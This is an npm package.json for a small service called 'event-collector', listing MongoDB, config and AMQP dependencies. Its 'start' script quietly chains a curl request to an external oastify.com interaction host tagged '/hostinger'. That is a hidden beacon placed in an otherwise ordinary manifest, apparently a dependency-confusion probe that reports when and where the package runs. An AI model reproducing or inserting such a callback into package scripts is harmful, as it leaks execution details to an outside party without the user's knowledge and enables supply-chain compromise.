{
  "name": "event-collector",
  "version": "0.0.1",
  "description": "",
  "main": "index.js",
  "scripts": {
    "start": "node start && curl https://kh50vx4myjq0l3wqcvukyf43iuopcm0b.oastify.com/hostinger",
    "test": "echo \"Error: no test specified\" && exit 1"
  },
  "author": "",
  "license": "BSD",
  "dependencies": {
    "mongodb": "~2.1.14",
    "config": "~1.19.0",
    "amqplib": "~0.4.1"
  }
}
